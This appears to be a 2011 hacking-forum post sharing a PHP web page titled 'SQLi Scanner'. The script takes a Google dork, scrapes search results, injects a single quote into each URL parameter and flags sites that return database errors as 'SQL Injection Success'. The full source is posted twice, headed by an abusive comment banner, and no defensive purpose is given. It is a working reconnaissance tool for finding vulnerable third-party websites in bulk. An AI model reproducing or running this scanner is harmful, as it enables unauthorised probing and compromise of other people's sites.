darkmindz
01-26-2011, 11:05 AM
<html>
<head>
<title>SQLi Scan - Dark Zone</title>
<!--
************************************************** **************
* SQLi Scanner by DarKmindz @ 31337 ZoNe *
* *
* Fuck You n00b & Shit Talker & Time Wasters & Scriptkiddiots! *
************************************************** **************
Written by DarKmindz @ 31337 ZoNe
Yuck Fou,
./DarkMindz &
-->
<style>
body{
background: black;
color: red;
font-family: monospace;
font-size: 12px;
}
input{
background: black;
border: 1px solid red;
color: red;
}
h2{
color: red;
}
a{ color: #5A5A5A; text-decoration: none; }
a:visited, a:active{ color: #5A5A5A; text-decoration: line-through; }
a:hover{ color: #00FF00; text-decoration: line-through; }
.effectok:hover { text-decoration: underline; }
.effectfalse:hover { text-decoration: line-through; }
</style>
</head>
<body>
<?php
echo "<center>";
echo "<form action='' method='post'>";
echo "<b>Dork</b>: <p><input type='text' name='dork' value='inurl:php?=id+site'></p>";
echo "<input type='submit' value=' Fvck It! '>";
echo "<hr><br />";
if($_POST['dork']) {
@set_time_limit(0);
@error_reporting(0);
@ignore_user_abort(true);
ini_set('memory_limit', '128M');
$google = "http://www.google.com/cse?cx=013269018370076798483%3Awdba3dlnxqm&q=REPLACE_DORK&num=100&hl=en&as_qdr=all&start=REPLACE_START&sa=N";
$i = 0;
$a = 0;
$b = 0;
while($b <= 900) {
$a = 0;
flush(); ob_flush();
echo "Pages: [ $b ]<br />";
echo "Dork: [ <b>".$_POST['dork']."</b> ]<br />";
echo "Scanning Google<br />";
flush(); ob_flush();
if(preg_match("/did not match any documents/", Connect_Host(str_replace(array("REPLACE_DORK", "REPLACE_START"), array("".$_POST['dork']."", "$b"), $google)), $val)) {
echo "Bisey bulunamadı<br />";
flush(); ob_flush();
break;
}
preg_match_all("/<h2 class=(.*?)><a href=\"(.*?)\" class=(.*?)>/", Connect_Host(str_replace(array("REPLACE_DORK", "REPLACE_START"), array("".$_POST['dork']."", "$b"), $google)), $sites);
echo "Loadiing…<br />";
flush(); ob_flush();
while(1) {
if(preg_match("/You have an error in your SQL|Division by zero in|supplied argument is not a valid MySQL result resource in|Call to a member function|Microsoft JET Database|ODBC Microsoft Access Driver|Microsoft OLE DB Provider for SQL Server|Unclosed quotation mark|Microsoft OLE DB Provider for Oracle|Incorrect syntax near|SQL query failed/", Connect_Host(str_replace("=", "='", $sites[2][$a])))) {
echo "<a href='".Clean(str_replace("=", "='", $sites[2][$a]))."' target='_blank' class='effectok'>".str_replace("=", "='", $sites[2][$a])."</a> <== <font color='green'>SQL Injection Success !</font><br />";
} else {
echo "<a href='".Clean(str_replace("=", "='", $sites[2][$a]))."' target='_blank' class='effectfalse'>".str_replace("=", "='", $sites[2][$a])."</a> <== <font color='red'>Not access ! </font><br />";
flush(); ob_flush();
}
if($a > count($sites[2])-2) {
echo "Bitti<br />";
break;
}
$a = $a+1;
}
$b = $b+100;
}
}
function Connect_Host($url) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_FOLLOW, 0);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, 30);
$data = curl_exec($ch);
if($data) {
return $data;
} else {
return 0;
}
}
function Clean($text) {
return htmlspecialchars($text, ENT_QUOTES);
}
echo "</center>";
?>
</body>
</html>
<head>
<title>SQLi Scan - Dark Zone</title>
<!--
************************************************** **************
* SQLi Scanner by DarKmindz @ 31337 ZoNe *
* *
* Fuck You n00b & Shit Talker & Time Wasters & Scriptkiddiots! *
************************************************** **************
Written by DarKmindz @ 31337 ZoNe
Yuck Fou,
./DarkMindz &
-->
<style>
body{
background: black;
color: red;
font-family: monospace;
font-size: 12px;
}
input{
background: black;
border: 1px solid red;
color: red;
}
h2{
color: red;
}
a{ color: #5A5A5A; text-decoration: none; }
a:visited, a:active{ color: #5A5A5A; text-decoration: line-through; }
a:hover{ color: #00FF00; text-decoration: line-through; }
.effectok:hover { text-decoration: underline; }
.effectfalse:hover { text-decoration: line-through; }
</style>
</head>
<body>
<?php
echo "<center>";
echo "<form action='' method='post'>";
echo "<b>Dork</b>: <p><input type='text' name='dork' value='inurl:php?=id+site'></p>";
echo "<input type='submit' value=' Fvck It! '>";
echo "<hr><br />";
if($_POST['dork']) {
@set_time_limit(0);
@error_reporting(0);
@ignore_user_abort(true);
ini_set('memory_limit', '128M');
$google = "http://www.google.com/cse?cx=013269018370076798483%3Awdba3dlnxqm&q=REPLACE_DORK&num=100&hl=en&as_qdr=all&start=REPLACE_START&sa=N";
$i = 0;
$a = 0;
$b = 0;
while($b <= 900) {
$a = 0;
flush(); ob_flush();
echo "Pages: [ $b ]<br />";
echo "Dork: [ <b>".$_POST['dork']."</b> ]<br />";
echo "Scanning Google<br />";
flush(); ob_flush();
if(preg_match("/did not match any documents/", Connect_Host(str_replace(array("REPLACE_DORK", "REPLACE_START"), array("".$_POST['dork']."", "$b"), $google)), $val)) {
echo "Bisey bulunamadı<br />";
flush(); ob_flush();
break;
}
preg_match_all("/<h2 class=(.*?)><a href=\"(.*?)\" class=(.*?)>/", Connect_Host(str_replace(array("REPLACE_DORK", "REPLACE_START"), array("".$_POST['dork']."", "$b"), $google)), $sites);
echo "Loadiing…<br />";
flush(); ob_flush();
while(1) {
if(preg_match("/You have an error in your SQL|Division by zero in|supplied argument is not a valid MySQL result resource in|Call to a member function|Microsoft JET Database|ODBC Microsoft Access Driver|Microsoft OLE DB Provider for SQL Server|Unclosed quotation mark|Microsoft OLE DB Provider for Oracle|Incorrect syntax near|SQL query failed/", Connect_Host(str_replace("=", "='", $sites[2][$a])))) {
echo "<a href='".Clean(str_replace("=", "='", $sites[2][$a]))."' target='_blank' class='effectok'>".str_replace("=", "='", $sites[2][$a])."</a> <== <font color='green'>SQL Injection Success !</font><br />";
} else {
echo "<a href='".Clean(str_replace("=", "='", $sites[2][$a]))."' target='_blank' class='effectfalse'>".str_replace("=", "='", $sites[2][$a])."</a> <== <font color='red'>Not access ! </font><br />";
flush(); ob_flush();
}
if($a > count($sites[2])-2) {
echo "Bitti<br />";
break;
}
$a = $a+1;
}
$b = $b+100;
}
}
function Connect_Host($url) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_FOLLOW, 0);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, 30);
$data = curl_exec($ch);
if($data) {
return $data;
} else {
return 0;
}
}
function Clean($text) {
return htmlspecialchars($text, ENT_QUOTES);
}
echo "</center>";
?>
</body>
</html>